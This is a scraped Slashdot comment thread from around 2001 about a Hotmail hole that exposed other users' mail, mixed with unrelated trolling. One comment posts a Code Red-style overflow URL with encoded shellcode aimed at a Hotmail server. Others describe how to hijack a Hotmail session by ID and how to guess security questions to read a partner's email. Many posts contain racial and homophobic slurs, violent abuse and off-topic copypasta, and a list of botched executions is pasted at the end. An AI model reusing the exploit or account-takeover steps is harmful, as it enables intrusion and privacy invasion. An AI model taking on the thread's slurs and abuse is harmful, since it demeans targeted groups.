_8_ . _ . _ . _ . _ 8_ . _8
_8_ . _ . _ . _ . _ 8_ . _8
_ 8_ . _ . _ . _ . 88_ . _8
_ .8_ . _ . _ . _ .8 8_ .8
_ . 8_ . _ . _ . _ 8_ 888
_ . _8_ . _ . _ . _8
_ . _ 8 . _ . _ . _8
_ . _ 8_ . _ . _ . 8
_ . _ 8_ . _ . _ . 8
_ . _ 8_ . _ . _ . 8
_ . _ 8_ . _ . _ . 8
_ . _ 8_ . _ . _ . 8

fuck you r0b

michael is a censoring son of a bitch. fuck off and die you bl00dy cocksuckers.

TRoLL.

If they hacked my account...

[MrBlack]

All they'd see is SPAM!

• form Horny1673_@somemadeupdomain.com Free Britney Spears Hardcore!
• from Blah684yi8s@anothercrapdomain.com Consolodate your debt now!
• from gr33r5s@hotmail.com Attract Men and Women

And let's not forget...I send you this e-mail in order to have your advice. I have a hard enough time reading my e-mail. Good luck to all the crackers out there who want to read my e-mail. I even got spammed the other day by someone selling orthopedic in-soles for people with a "leg lenght discrepancy" now that is something I'm looking forward to more in the future, Niche Spam.

Re:Informative - More like criminal action actuall

how is simple information illegal? i can go to the library and purchase a book on how to do something illegal, does that mean they shouldnt be allowed to have those type of books? no... and if i checkout a book on how to blow up a building and end up doing it, the library isnt responsible for my action, is it? no...

220000th post has left the builidng

you got lucky, 2300000th you won't be so lucky!

Computer code is like legal code . .

[Nanookanano]

. . the more you amend it, the more holes you create.

Re:Computer code is like legal code . .

blow it out yer ass cockbreath.

Re:Computer code is like legal code . .

[Nanookanano]

You wish, little man.

Re:RMS....WRONG

Richard "GNU/" Stallman says: "****GNU/*****2199949th post!

Have a Great GNU/Day!

2200000 pHyZ0xT!! ya nigger!!!

congratulations mr. nigger!

TRoLL.

Beastiality...

...I know some of you are into it but you have to admit this is taking things too far.

TRoLL.

No mention of DMCA?

[t_allardyce]

Surely these evil people should be sued by Microsoft under the lovely DMCA for being so smart? I'm just glad Microsoft don't run anything important like government sites... oh, um, yes, the uk government.

-tfga

FreeBSD

[lostchicken]

It seems to me that this happened much less often when Microsoft used FreeBSD.

Also does anyone know if Microsoft switched scripting engines with the move to W2K? If they kept the old engine, something tells me it wasn't Chili!ASP...

Re:FreeBSD

[yomegaman]

It's a bug in the Hotmail code itself, it has nothing to do with the underlying operating system.

Re:FreeBSD

*BSD faces a very bleak future. I've seen the same boring cut-n-paste "BSD is dying!" trolls for years now too, so don't dismiss what I have to say as another one of those.

Granted 4.2BSD was a very fine OS, but that was in 1983. 4.4BSD, and its brother 4.4BSBD-Lite, were abymsmal performers at best during their heydey in 1993-4. Both Solaris and HP-UX had networking stacks that supported "long fat pipes," multicasting, and TCP header header prediction years before 4.4BSD did.

I don't know why 4.4BSD-Lite became so popular. Perhaps because it was released as OpenSource in 1994? But even then there were much better TCP/IP stacks and VM schemes in use (Solaris, AIX) so availability of source code was an insignificant win at best. All OpenSource does is allow poor quality code to be re-circulated and reused again and again in new systems, while high quality and RFC compliant code is relagated to the pay environment.

Regardless, the codebase of 4.4BSD-Lite became the stepping stone for all the *BSDs that are still around now. The main three *BSDs (FreeBSD, OpenBSD, NetBSD) all use at least 85% of 4.4BSD-Lite's source code, with the rest being mostly new userland code, TCP/IP updates, and multiprocessor support.

The commerical offering, BSDI, is even more appaling - a source code diff shows roughly 94% code reuse. Paying for an archaic and outdated OS...that would explain why BSDI has less than 1% of the server market.

In fact, all major surveys show that *BSD has steadily declined in market share. *BSD is very sick and its long term survival prospects are very dim. If *BSD is to survive at all it will be among OS hobbyists dabblers. *BSD continues to decay. Nothing short of a miracle could save it at this point in time.

Why now? Why did *BSD fail? Once you get past the fact that *BSD is fragmented between a myriad of incompatible kernels, there is the historical record of failure and of failed operating systems. *BSD experienced moderate success about 15 years ago in academic circles. Since then it has been in steady decline. We all know *BSD keeps losing market share but why? Is it the problematic personalities of many of the key players? Or is it larger than their troubled personalities?

The record is clear on one thing: no operating system has ever come back from the grave. Efforts to resuscitate *BSD are one step away from spiritualists wishing to communicate with the dead. As the situation grows more desperate for the adherents of this doomed OS, the sorrow takes hold. An unremitting gloom hangs like a death shround over a once hopeful *BSD community. The hope is gone; a mournful nostalgia has settled in. Now is the end time for *BSD. For all practical purposes, *BSD is dead.

Re:FreeBSD

[WildBeast]

Good point but I don't really see it as a bug, I view it more as a lacking feature, an important one.

Re:Informative - More like criminal action NOT

[Caez]

SO WHAT?!?!! big lawyer pants. IT IS MICROSOFT's problem. The fact that the security flaw is there AT ALL is a fact the the Redmond Washington Software piece of #%*( making giant SHOULD BE SUED!!! Explotiting the flaw IS THE ONLY WAY TO GET THEM TO FIX IT. plus, if you use Hotmail for anything "important" or "confidential" YOU ARE A DUMB ASS!

Look into de cards, mon...

[mypalmike]

> about once a week, someone emails me and says "I think my boyfriend/girlfriend is cheating on me and I really need to know the backdoor into hotmail to find out".

This is how Miss Cleo knows all the answers!

NAZI PUNKS FUCK OFF

Punk ain't no religous cult
Punk means thinking for yourself
You aren't hardcore cos you spike your hair
When a jock still lives inside your head

Chorus:
Nazi Punks
Nazi Punks
Nazi Punks...FUCK OFF!
Nazi Punks
Nazi Punks
Nazi Punks...FUCK OFF!

If you're gonna fight, get outta here
You ain't no better than the bouncers
We ain't tryin' to be police
You ain't the cops, this ain't anarchy

Repeat chorus

Ten guys jump one, what a man
You fight each other, the police state wins
Stab your back when you trash our halls
Trash a bank if you got real balls

You still swastikas look cool
The real nazis run your schools
They're coaches, businessmen and cops
In the real fourth reich you'll be the first to go

Repeat Chorus

You'll be the first to go
You'll be the first to go
You'll be the first to go...unless you think!

-Dead Kennedys

Re:NAZI PUNKS FUCK OFF

Punks are dirty, disgusting, crusty, ugly, lazy faggots. They are nothing but pure shit.

Skinheads have pride. Respect. They're clean, hard working, strong, and compassionate.

Re:NAZI PUNKS FUCK OFF

Skinheads have pride. Respect. They're clean, hard working, strong, and compassionate.

Aahahahahahahahahahahahahahahahahahahahahahahaha hh ahahahahahahahahahahahahahahahahahahahhaahahahahah

excuse me while I pick myself up off the floor

Re:NAZI PUNKS FUCK OFF

They're clean, hard working, strong, and compassionate.

I'm sure crapflooding message boards with racist comments is real hard work. Now FUCK OFF, NAZI PUNK.

don't work no more

apparently this hack doesnt work anymore
MS must've closed up da hole

Alyson Hannigan

is a dream

especially dressed in grits...

Re:Informative - More like criminal action actuall

Yeah thats right - but this user posted code which allows the user to exploit a commercial system thus it is illegal - dont let free speech convince you that information is free - this is called evidence of intent - like if the cops search your house and say find this code and a computer then they can charge you with computer crime and then they go thru everything you have on CD's etc etc - get the point.

This sort of information makes a mockery of this groups 'white hat' masturbation - yeah we found the hole, then we told you (as well as the entire free world) but we are only trying to help honest.

hackers are wankers - no excuses no maybes - there is no justification for the damage they do and never will be.

moderators on crack

Grimace, McDonalds character, dead at 13 (Score:0, Insightful)
by Anonymous Coward on Monday August 20, @05:41PM (#2199859)
I just heard sad news on talk radio -McDonalds commercial star/character Grimace was found dead in his McDonalds house this morning. I'm sure we'll all miss him - even if you didn't eat his food you've probably enjoyed one of his pornographic movies. Truly a purple American homosexual.

Related Link [mcdonalds.com]
[ Reply to This | Parent ]

Re:moderators on crack

bwahahahahhahah LOL! you bastard you almost made me spew iced tea all over myself. hahahahha

niggers

niggers are brown and smelly.

How is /. choosing moderators these days?

This is insightfull ? what are you man - a crack baby that got dropped on its head ?

Grimace found dead in his mcdonalds house ?
Enjoyed one of his pornograhic movies ?

This is actually a direct copy of the Stephen King Troll post with some words replaced.

Its not informative its crap - can we find out who this moderator is and make sure he never has the privelege again?

Re:Informative - More like criminal action actuall

since when did libraries start selling books instead of lending them (aside from the occasional used book sale)? Oh, that's right. Public libraries, the napsters of the 18th century, had been "sharing" copyrighted material, until the Pay-per-view Copyright Act outlawed all forms of "sharing" of copyrighted material.

funny post above ROFL

mod up parent

Re:Informative - More like criminal action actuall

heh, i meant to say lend.

always the same?

[Roadmaster]

It looks like since Hotmail was taken over by Microsoft these incidents have multiplied. Perhaps some hotmail old-timers can tell stories of how it was before Microsoft? this would be good to know, whether hotmail has always been insecure, whether the incidents started when Microsoft took over, or maybe it's just because hotmail has too many users, or maybe, yes, because the new owners (Microsoft) are simply incompetent regarding security (given their track record I don't think this is too far-fetched).

I would never use hotmail in a regular basis. I only have an account in order to use MSN messenger (I use Everybuddy, not the damn MS client), because there are people i can't convince to use something better. Yet, I'd qualify hotmail as unusable; it's slow, bloated, ugly, gets in your way with so many damned little messages (it's so microsoft), and to top it off, the account receives an average of 50 spams a day. And NOBODY has that address. The only explanation: those mofos sell their addresses to spammers.

Re:always the same?

It looks like since Hotmail was taken over by Alyson Hannigan these incidents have multiplied. Perhaps some hotmail old-timers can tell stories of how it was before Alyson? this would be good to know, whether hotmail has always been so sexy, whether the incidents started when Alyson took over, or maybe it's just because Alyson (oops, sorry, hotmail) has too many users, or maybe, yes, because the new owner (Alyson) are simply incompetent regarding her sexyness (given their track record I don't think this is too far-fetched).

always the same? (Score:1)
by Roadmaster on Monday August 20, @06:16PM (#2200079)
(User #96317 Info | http://www.entropia.com.mx/~roadmr)
It looks like since Hotmail was taken over by Microsoft these incidents have multiplied. Perhaps some hotmail old-timers can tell stories of how it was before Microsoft? this would be good to know, whether hotmail has always been insecure, whether the incidents started when Microsoft took over, or maybe it's just because hotmail has too many users, or maybe, yes, because the new owners (Microsoft) are simply incompetent regarding security (given their track record I don't think this is too far-fetched).

I would never use Alyson Hannigan on a regular basis. I only have an account in order to use GRITS messenger (I use Everybuddy [everybuddy.com], not the damn MS client), because there are people i can't convince to stop jacking to Britney Spears. Yet, I'd qualify Britney as unusable; she's slow, bloated, ugly, gets in your way with so many damned little halter tops (it's so Britney), and to top it off, the account receives an average of 50 spams a day. And NOBODY has been THERE before (so she says). The only explanation: those mofos sell their addresses to spammers.

Re:always the same?

[netsharc]

I remember an old hotmail hack, it used to be when you logged in you get a random string of numbers in the URL, which was probably your session ID. How do you access another person's account? Basically, the victim has to be logged in, then you need to login using the victim's username, and use anything as the password. The password error page you would get had the same session ID as the victim's! Then just change the URL from (not literally...) hotmail.com/[session-id]/error to hotmail.com/[session-id]/inbox.

Hotmail implemented cookies and IP checking after that..

Re:always the same?

hotmail attacks rose dramatically after microsoft took over it. i dont think that simply because MS bought something the code disintegrated

Re:Informative - More like criminal action actuall

[yomahz]

how is simple information illegal

I dunno.. but it is. I keep asking myself the same question.

i hope they find the criminals who did this

and jail them for life where they will be raped, beaten, stabbed, and hopefully killed. obey the DMCA or die!!!!

Re:i hope they find the criminals who did this

[loconet]

I totally Agree with you, those miserable criminals shoudl be raped!! and to help out justice ..here is their address:

One Microsoft Way Redmond, WA 98052-6399

If one found it, others could too

[A+nonymous+Coward]

What you seem to be saying is that if the people hadn't reported it / found it, there would be no problem. This seems to imply you think they are the only ones capable of finding this particular hole.

So if I see a dangerous condition -- say, a truck moving down the highway with a flat tire falling to pieces, or a leaking gasoline tank, or a fallen power line, or a boat coming unmoored, or a building with loose masonry, or a bad pothole, any number of things -- if I see any of these, rather than warn the public of the danger, better I should leave a note for the owner, who may be off on vacation and won't respond for several weeks? Am I supposed to be so worried that some lunatic might throw a match into the leaking gasoline that I say nothing at all?

I think you need to bury your head in the sand a bit deeper, instead of surfacing now and then to say such silly things.

On aside...

[SuperKendall]

I hope they leave the bug in place, and have the message counter go down instead of up! That would really mean First Posts were inaccurate, though it would set a cap on discussions...

Re:On aside...

Yeah.

LAST POST! SUCKAZ@@$!

And so on...

--sdem

help

let me have alyson hannigan and everything will be all right...

be sure I get the hot grits!

Here's another way

[Srin+Tuar]

1. Log into hotmail normally.

2. Type in this link:

http://pv2fd.pav2.hotmail.msn.com/default.ida?XX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858
%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858 %u cbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u53
1b%u53ff%u0078%u0000%u00=a HTTP/1.0

Re:Here's another way

I don't remember the exact code, but that looks an awful lot like the code red sig.............

Re:Here's another way

That's hilarious, and if I had mod points, I'd mod you up.

-Ben

Posted anonymously since the new slashcode won't let me log in.

Re:Here's another way

[Kevin+Mitnick]

eureka! fucking einstein

So we might as well shut down Bugtraq...

[ActMatrix]

This exploit information came straight from Root-Core's site and was also posted to Bugtraq. If pasting it here is potentially 'illegal' than so are 90% of Bugtraq posts.

Yes, perhaps one unfortunate day it will be illegal to explain security vulnerabilities in depth, but until then there's little wrong in supporting open disclosure. Security through obscurity doesn't work.

Accessories to a crime by having this post on Slashdot? Yep, you Must be a lawyer if you can come up with and rationalize arguments like that.

Re:So we might as well shut down Bugtraq...

[friscolr]

If pasting it here is potentially 'illegal' than so are 90% of Bugtraq posts.

the intent is different in the bugtraq post vs. the slashdot post.

at least, that's what i'd imagine a prosecutor might say.

Re:So we might as well shut down Bugtraq...

correct

Intent is a very important thing to remember - we are talking the law here not just some 'if this is illegal then that it'

Bugtraq is a site designed for security reasons - not everyone reads it - this post was written SOLELY for the point of telling users exactly how to compromise a system not belonging to them to gain access to information not meant for them.

Do it to the US postal system and it mail/wire fraud.

Re:So we might as well shut down Bugtraq...

[ActMatrix]

Who's to say what the intent of the person who posted the message was? His/her subject line was non descript, there were no extraneous remarks like "Cool check out how easy it is to read everyone's email..you gotta try this". And Slashdot is a "News for Nerds" site..we're all (or mostly) techies here and security is certainly a topic. Constructing an argument based around 'intent' construed in that manner is pure speculation and would never hold up in courts.

Re:So we might as well shut down Bugtraq...

Nope - under the law his intent would be sufficiently demonstratable - That is he knew or had a reasonable knowledge that by posting said information here he would be promoting and facilitating the hacking of a secure system (and the law would define this as a secure system in that it requires passwords and membership for access and the users have a reasonable expectation of privacy) thus his intent is clear in legal terms - this is all the law requires in terms of inent and the type of forum becomes largely irelevant.

/. constantly plays host to incitments to commit DOS attacks, Hacks, send mail floods, posts confidential information (this is IMHO a good thing BUT there are consequences) any good lawyer would be able to use this to show prior actions and thus establish tacit if unspoken consent of the poster and his opinions.

This would be sufficient in a civil case to obtain a succesful verdict for damages (expecially once the prosecution has painted the old hackers and evil crackers picture for the Jury).

I dont think this will happen but it would be a good thing for /. to understand that there are legal ramifications of their actions and i suspect one day they will get hit over the head with the legal stick - hard

Re:So we might as well shut down Bugtraq...

[aozilla]

That is he knew or had a reasonable knowledge that by posting said information here he would be promoting and facilitating the hacking of a secure system

And once again, the same could be said of bugtraq. Personally I feel that posting the exploit lent a lot more credibility to the story, and I'm seriously considering moving all my mail off of hotmail because of it. Of course, I don't know where exactly I'd move my mail to, so I guess I'm going to leave it there. Of all the free, web-accessible sites out there, I bet you hotmail is the most secure.

Re:So we might as well shut down Bugtraq...

Get real!! "The Law" is FAR FROM CONCRETE on issues like these. In fact, it seems as though nothing is written in stone in the law.

You wanna know how issues like this get resolved in a court of law? Whoever pays the most money to drag the case out the longest. That's what the american legal system has come down to. There's no right or wrong, only the rich and the richer.

It's a fucken joke.

Re:So we might as well shut down Bugtraq...

UMMM and the point you are making is ?

MS - 100+billion dollar company
Slashdot - $2.50 in change and some VA Linux Shares

Who's gonna win ?

Re:So we might as well shut down Bugtraq...

[flatrock]

Yes, perhaps one unfortunate day it will be illegal to explain security vulnerabilities in depth, but until then there's little wrong in supporting open disclosure. Security through obscurity doesn't work.

Please explain to me how open disclosure of the details of how this hack is performed helps in this case. This is a closed system. Knowing the details of how the hack is performed doesn't help anyone in the general population fix this problem. It just allows malicious people to invade other people's privacy.
I can understand posting that the bug exists, and general information so that people have an idea if their information is at risk. I think it's great when white hat hackers let a company know that they've got a security hole, and give them a chance to close it. If they don't make an effort to close it, then there may be some justification to full disclosure.
However, claiming you've wearing a white hat while feeding the script kiddies info, when there's no real possitive effect is a load of bull. These people need to learn the difference between helping others and feeding their own egos.
The slashdot community often seems to get up in arms because the media doesn't understand the difference between a hacker and a cracker. Maybe the media can't figure out the difference, because the hackers and crackers can't figure out the difference either.

Re:So we might as well shut down Bugtraq...

why would it be the most secure? Ah, I forgot, Microsoft has a reputation of having much better security in their products... sorry

I suggest you try out Hushmail

Re:So we might as well shut down Bugtraq...

Well Slashdot did last time Microsoft threatened them. Although they did back down against the $cientologists (Who are all smelly child molesting hicks, with no free thought, sense or education. They all eat poo for breakfast and like it. This is a fact)

Wonder if they're still reading....

Re:So we might as well shut down Bugtraq...

[aozilla]

why would it be the most secure?

Because there are more people trying to find holes in it than any other system.

I suggest you try out Hushmail.

What I want is an email account which PGP encrypts the email with my public key as soon as it receives it, and then destroys the original. Then even my email provider can't read my mail unless it intercepts the mail before it is encrypted. Anyone who breaks in likewise can only get newly sent mail.

Even if that was implemented I'd still assume that all my mail could be read by someone if they really wanted to. You simply shouldn't be sending sensitive information via email unless it's end to end encrypted. If you're assuming any security against a semi-determined attacker absent that encryption, that is your main problem.

Good one Cmdr

This isn't the first time that the folks who are gonna give us a internet wide universal login system had a hole

Not only is this an redundant post, you've made yourself sound like a idiot.

Watch out...

[zdewitt9]

All of us could probably go to jail for reading this....

I'm surprised that 1) root core didn't keep themselves anonymous and 2) gol64738 didn't either.

After that ISP security hole lawsuit, I certainly would've...

Re:Watch out...

I am probably gonna end up in prison for posting this article.

fuckin nigs man

i just read in the news the niggers are building a tupac shakur memorial museum. You know your race is a bunch of pathetic monkeys when the only person you can come up with to dedicate a museum to is a drug dealing, coke sniffing felon who did time for rape. If that's most talented role model the niggers could come up with, it's no wonder they amount to nothing but welfare leeches.

Re:fuckin nigs man

You sir are a troll and a loser - fuck off.

If adolf hitler is the best role model you can come up with then your problems go way beyond welfare.

Re:fuckin nigs man

Hey i don't see any white people building a hitler memorial praising what a great man he was.

However the niggers are doing this with tupac.

Oh and the spics wanted to name an ave in the bronx after big pun. He was a 700 pound pig who rapped about killing police, gee ya lets name a street after him. Gulliani told those fucking spics to get lost...

Hushmail, people...

[dark_panda]

It's encrypted (with end-to-end encryption between HushMail users -- email sent to non-Hush accounts are only sent to Hush's servers unencryped), it's more secure. I'm not a Hush representative, but after using it for a few months, it's definitely the answer. (The question being, what's the best free email service?)

J

how is this insightful

how is this insightful? the troll who posted this is a motherfucking homosexual cocksucking faggit

mail.yahoo.com

[londenberg]

It's amazing that I've never heard of a hole in Yahoo's webmail.

Re:mail.yahoo.com

[richardhuman]

Yahoo uses Inscibe Message Store from Critical Path. I've had the pleasure of using this product. It's fast, rock solid and secure - and the guys at CP are the best when it comes to tech support. They take security and standards compliance very seriously.

CP products account for 152 million mailboxes worldwide for companies like E-trade, ICQ, etc.

once a week for two years?

[Sabol]

Lets see, 52 weeks in a year, two years...

You're telling me that at least 104 slashdoters have girlfriends! Get out!

Re:once a week for two years?

[amorsen]

It's the same girl every week.

PS: The answer is no, I don't cheat on her.

Re:once a week for two years?

[farmhick]

No, some of the slashdotters are women, checking on their non-/. boyfriends. That should push that number back down under 100. As for me, I would have a girlfriend, but my wife would kill me. ;^)

hey

i thought open source was supposed to produce better code. So why the fuck does everyone get all this invalid formkey shit? huh? looks to me like open source is a big fucking rip off. This site gets alot of traffic why doens't VA fire these dorky lamers and get some real coders in there to fix this mess.

Re:Informative - More like criminal action actuall

[startled]

"(pretty disclaimers aside you are legally responsible for the content here - its just that no one has decided to pursue it yet)"

This suit is the closest I've managed to dig up so far, but between Communications Privacy Decency Act (or somesuch) and DMCA, along with a prevailing broad interpretation of "service provider", most message boards such as AOL, etc., have been found to have no liability for what goes on. If that weren't the case, ezboards would've been toast a long time ago, and AOL would be fighting dozens of lawsuits a month. Do you have any examples of case law to back up your statement?

Re:Informative - More like criminal action actuall

[gol64738]

oh, well then i have three words for you:

1. neener
2. neener
3. and, uh, um..oh yeah, neener.

Very secret information....

[thrillbert]

I know that /. will probably get a nasty email asking them to remove this post, but I just feel the need to post this bit of information:

NOTE: By following these directions you will be breaking the law.


while (in_car(use *right_foot))\
push(($pedal) to go [@REALLY_FAST]);

I have had this information in my head for years, but felt it was time to inform the rest of you how to do it. Now I know I will be pursued by lawyers attempting to utilize the DMCA against me for revealing this information that the vehicle manufacturers did not want you to know... such is the life of a hacker...

Re:Very secret information....

[Cederic]

Hi, how am I breaking the law? I'm sat here in my car, the engine blew up and I didn't go anywhere.

Was I meant to put the car in gear and take the brakes off at some point?

Seriously, which idiots modded this guy up to +5? It's off-topic, not amusing, and wrong.

As for the hotmail thing: it is a bad hole, you shouldn't be able to view other people's email. And you can easily automate the number guessing. So it needs to be fixed, and I'm glad I don't use hotmail.

~Ced

Re:Very secret information....

[Evil+MarNuke]

You know I tired this crack but it didn't work.

Do you think it would help if my router wasn't shoved up your ass side ways?

Post #2200250 is coming!

It's almost there: the 2,200,000th post on Slashdot!

Who is it gonna be? Who will post the magic number? Who is gonna be #2200250 ???

Let's hope it will not be an AC! We want to deliver champagne and cavair to the winner personally! Next to this, he or she will receive a free subscription to Slashdot.org and Goatse.cx for a year!

Let the game begin! Oh, it's so exciting!!

BSD

Well, where are all the people who always point out that Hotmail runs BSD? It's a unix problem bla bla bla

My gf and I share passwords

[Sabol]

I don't know about the rest of you, but I know all my girlfriends passwords and accounts, and she knows all of mine. It just makes it easier, since we use a lot of the same accounts and systems.

Yes, that means that if I wanted to, I could check any of her email accounts. Do I? ... Nope. I doubt she checks mine either. We trust each other.

If you are in a point in a relationship where you feel the need to spy on your signifigant other, then it's probably a sign of deeper problems.

Re:My gf and I share passwords

[ahde]

sure you do. She may know all of yours, and you may think you know all of hers, but...

Re:My gf and I share passwords

In that case its going to be quite funny when you split up...

Re:My gf and I share passwords

You, my friend, are an idiot.

Re:My gf and I share passwords

I know I'm excited.

You've got mail!

[fmaxwell]

AOL: You've got mail!
Hotmail: You've got someone else's mail!

Re:You've got mail!

[unitron]

What I was wondering was if I could open an account and use it to access those other Hotmail accounts I opened back when with phony names and details and forgot the passwords for.

Re:You've got mail!

[DreamingReal]

I am absolutely laughing my ass of!

Re:You've got mail!

[LoudMusic]

That's the funniest thing I've read all day! You rock! I'm going to read all the rest of your posts now (:

~LoudMusic

Re:You've got mail!

[Black+Parrot]

> AOL: You've got mail!

Hotmail: You got nailed!

Alternate Headlines?

[Alien54]

Actually, I would think that it would be news if MS and Hotmail went without a hole being found for a year or two.

But then, MS keeps messing with things.

maybe that's what they are doing. Not so much fixing bugs, but practicing security by randoming shifting the bugs around.

Sorta like Whack-a Mole

;-)

- - -
Radio Free Nation
is a news site based on Slash Code
"If You have a Story, We have a Soap Box"
- - -

Re:Informative - More like criminal action actuall

[blang]

I don't mean to be a stick in the mud

How about the part of thelaw that says that parody, satire and caricature is free speech. Clearly the layout of this exploit is a satire along the lines of: How A Three Year Old Can Break Into Fort Knox And Get Away With Half A Trillion Dollars Without Even Trying Very Hard.

We await your lawyerly opinion.

You may be a lawyer, but it appears you are wrong about the link part. 2600 and many others were taken to court and lost, by posting links to DeCSS code, something that is quite outrageous, but it flew in court.

So what?

[sharkey]

You know the kind of letters people write:

"Dear Somebody-you-never-heard-of,
How are you? I am fine. Blah-blah-blah, blah-blah, blah-blah.
Yours Truly,
Some Bozo."

Big deal.
--Homer Simpson

Re:Informative - More like criminal action actuall

You may be a lawyer, but you also suck dick.

Let me get this straight...

[mgkimsal2]

I've authenticated with a username and password, yet the username is also being passed in the GET string? And no check is being done to compare the username in the GET string is the same as the username associated with my session ID? Why is doing that simple comparison so hard? It would certainly "raise the bar" even higher on the "infeasible computational" chances of this happening.

This is similar to the Ameritech ebill security hole: no checking of user authentication - just GET any billing information with a *SEQUENTIAL* session ID in the GET string.

If this is an example of the authentication they've planned for Hailstorm services, I think many more people may have second thoughts about quick adoption.

Re:Let me get this straight...

[esammer]

unfortunately, most username / password authentication systems are built *more* for the purposes of maintaining user information (like preferences and such) then for true security. you can look at many systems used by many sites and the username and password info is put in very obvious places (like hidden html input fields and in the query string of http requests) thus making security a secondary issue. is this right? no, of course not. is it the current state of how many people view user information, maybe. it is a problem? yes.

Re:Let me get this straight...

[WildBeast]

That looks like the kind of security mistake I did when I was at the very beginning of web programming and it didn't take me long to discover and fix it.

Guess the answer of the secret question

[sumengen]

You don't need to be a hacker to read your girl/boyfriends hotmail email. 99% of the time you can guess the answer of the secret question and get access to the account. I have seen people doing it all the time.

What next?

[KenDUDE]

Ok first they make the goverment mad. Then they start hurting all the MCSE and MCTs buy useing us as marketing tools and charging us more for the same benifits that used to be free. Then the schools and now they can not keep hotmail up. Next thing you know they will try to make us pay way to much for there software ........ ohhh wait that happened.

hang 'em high

Post-Furman Botched Executions
by Michael L. Radelet, University of Florida

1. August 10, 1982. Virginia. Frank J. Coppola. Electrocution. Although no media representatives witnessed the execution and no details were ever released by the Virginia Department of Corrections, an attorney who was present later stated that it took two 55-second jolts of electricity to kill Coppola. The second jolt produced the odor and sizzling sound of burning flesh, and Coppola's head and leg caught on fire. Smoke filled the death chamber from floor to ceiling with a smokey haze.1

2. April 22, 1983. Alabama. John Evans. Electrocution. After the first jolt of electricity, sparks and flames erupted from the electrode attached to Evans's leg. The electrode burst from the strap holding it in place and caught on fire. Smoke and sparks also came out from under the hood in the vicinity of Evans's left temple. Two physicians entered the chamber and found a heartbeat. The electrode was reattached to his leg, and another jolt of electricity was applied. This resulted in more smoke and burning flesh. Again the doctors found a heartbeat. Ignoring the pleas of Evans's lawyer, a third jolt of electricity was applied. The execution took 14 minutes and left Evans's body charred and smoldering.2

3. Sept. 2, 1983. Mississippi. Jimmy Lee Gray. Asphyxiation. Officials had to clear the room eight minutes after the gas was released when Gray's desperate gasps for air repulsed witnesses. His attorney, Dennis Balske of Montgomery, Alabama, criticized state officials for clearing the room when the inmate was still alive. Said noted death penalty defense attorney David Bruck, "Jimmy Lee Gray died banging his head against a steel pole in the gas chamber while the reporters counted his moans (eleven, according to the Associated Press)."3 Later it was revealed that the executioner, Barry Bruce, was drunk.4

4. December 12, 1984. Georgia. Alpha Otis Stephens. Electrocution. "The first charge of electricity ... failed to kill him, and he struggled to breathe for eight minutes before a second charge carried out his death sentence ..."5 After the first two minute power surge, there was a six minute pause so his body could cool before physicians could examine him (and declare that another jolt was needed). During that six-minute interval, Stephens took 23 breaths. A Georgia prison official said, "Stephens was just not a conductor" of electricity.6

5. March 13, 1985. Texas. Stephen Peter Morin. Lethal Injection. Because of Morin's history of drug abuse, the execution technicians were forced to probe both of Morin's arms and one of his legs with needles for nearly 45 minutes before they found a suitable vein.7

6. October 16, 1985. Indiana. William E. Vandiver. Electrocution. After the first administration of 2,300 volts, Vandiver was still breathing. The execution eventually took 17 minutes and five jolts of electricity.8 Vandiver's attorney, Herbert Shaps, witnessed the execution and observed smoke and the smell of burning. He called the execution "outrageous." The Department of Corrections admitted the execution "did not go according to plan."9

7. August 20, 1986. Texas. Randy Woolls. Lethal Injection. A drug addict, Woolls helped the execution technicians find a useable vein for the execution.10

8. June 24, 1987. Texas. Elliot Rod Johnson. Lethal Injection. Because of collapsed veins, it took nearly an hour to complete the execution.11

9. December 13, 1988. Texas. Raymond Landry. Lethal Injection. Pronounced dead 40 minutes after being strapped to the execution gurney and 24 minutes after the drugs first started flowing into his arms.12 Two minutes after the drugs were administered, the syringe came out of Landry's vein, spraying the deadly chemicals across the room toward witnesses. The curtain separating the witnesses from the inmate was then pulled, and not reopened for fourteen minutes while the execution team reinserted the catheter into the vein. Witnesses reported "at least one groan." A spokesman for the Texas Department of Correction, Charles Brown (sic), said, "There was something of a delay in the execution because of what officials called a 'blowout.' The syringe came out of the vein, and the warden ordered the (execution) team to reinsert the catheter into the vein."13

10. May 24, 1989. Texas. Stephen McCoy. Lethal Injection. He had such a violent physical reaction to the drugs (heaving chest, gasping, choking, back arching off the gurney, etc.) that one of the witnesses (male) fainted, crashing into and knocking over another witness. Houston attorney Karen Zellars, who represented McCoy and witnessed the execution, thought the fainting would catalyze a chain reaction. The Texas Attorney General admitted the inmate "seemed to have a somewhat stronger reaction," adding "The drugs might have been administered in a heavier dose or more rapidly."14

11. July 14, 1989. Alabama. Horace Franklin Dunkins, Jr. Electrocution. It took two jolts of electricity, nine minutes apart, to complete the execution. After the first jolt failed to kill the prisoner (who was mildly retarded), the captain of the prison guard opened the door to the witness room and stated "I believe we've got the jacks on wrong."15 Because the cables had been connected improperly, it was impossible to dispense sufficient current to cause death. The cables were reconnected before a second jolt was administered. Death was pronounced 19 minutes after the first electric charge. At a post-execution news conference, Alabama Prison Commissioner Morris Thigpen said, "I regret very very much what happened. [The cause] was human error."16

12. May 4, 1990. Florida. Jesse Joseph Tafero. Electrocution. During the execution, six-inch flames erupted from Tafero's head, and three jolts of power were required to stop his breathing. State officials claimed that the botched execution was caused by "inadvertent human error" -- the inappropriate substitution of a synthetic sponge for a natural sponge that had been used in previous executions.17 They attempted to support this theory by sticking a part of a synthetic sponge into a "common household toaster" and observing that it smoldered and caught fire.18

13. September 12, 1990. Illinois. Charles Walker. Lethal Injection. Because of equipment failure and human error, Walker suffered excruciating pain during his execution. According to Gary Sutterfield, an engineer from the Missouri State Prison who was retained by the State of Illinois to assist with Walker's execution, a kink in the plastic tubing going into Walker's arm stopped the deadly chemicals from reaching Walker. In addition, the intravenous needle was inserted pointing at Walker's fingers instead of his heart, prolonging the execution.19

